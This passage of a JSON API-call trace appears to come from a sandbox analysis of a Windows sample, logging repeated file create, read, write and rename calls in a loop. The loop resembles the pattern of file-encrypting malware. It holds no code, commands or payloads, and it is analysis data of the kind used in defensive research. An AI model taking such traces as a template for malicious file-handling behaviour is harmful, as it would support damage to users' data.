17:41:50,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,915", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,945", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,975", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,985", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,985", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,995", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,995", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,005", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,016", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,026", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,026", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,036", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,056", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,076", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,096", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": 